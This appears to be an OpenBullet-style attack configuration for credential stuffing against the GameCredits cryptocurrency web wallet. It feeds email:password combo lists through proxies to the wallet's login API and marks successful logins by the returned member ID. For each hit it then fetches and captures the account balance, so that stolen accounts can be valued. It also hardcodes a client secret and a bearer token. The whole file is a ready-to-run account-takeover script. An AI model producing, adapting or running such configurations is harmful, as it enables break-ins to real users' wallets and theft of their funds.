[SETTINGS]
{
  "Name": "GameCredits Wallet",
  "SuggestedBots": 1,
  "LastModified": "2018-09-02T06:25:59.256698+00:00",
  "AdditionalInfo": "",
  "Author": "sqrt",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#Main REQUEST POST "https://api.gamecredits.com/api/v1/member/login" AutoRedirect=TRUE 
  CONTENT "{\"client_id\":\"gcwWebWallet\",\"client_secret\":\"38axi00c3j\",\"member_email\":\"<USER>\",\"member_password\":\"<PASS>\",\"member_username\":\"\"}" 
  CONTENTTYPE "application/json;charset=UTF-8" 
  HEADER "Accept: application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Origin: https://wallet.gamecredits.com" 
  HEADER "Referer: https://wallet.gamecredits.com/auth" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "member_id" 
  KEYCHAIN Failure OR 
    KEY "Cannot login using the supplied credentials" 
#Redirect REQUEST GET "https://api.gamecredits.com/api/v1/member/balance/gamecrs" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "authorization: Bearer 3d6fe98143844d18aee56fd0e2190990" 
#Points_Capture PARSE "<SOURCE>" LR "{\"amount\":" "}" Recursive=FALSE -> CAP "Balance" "" "" 
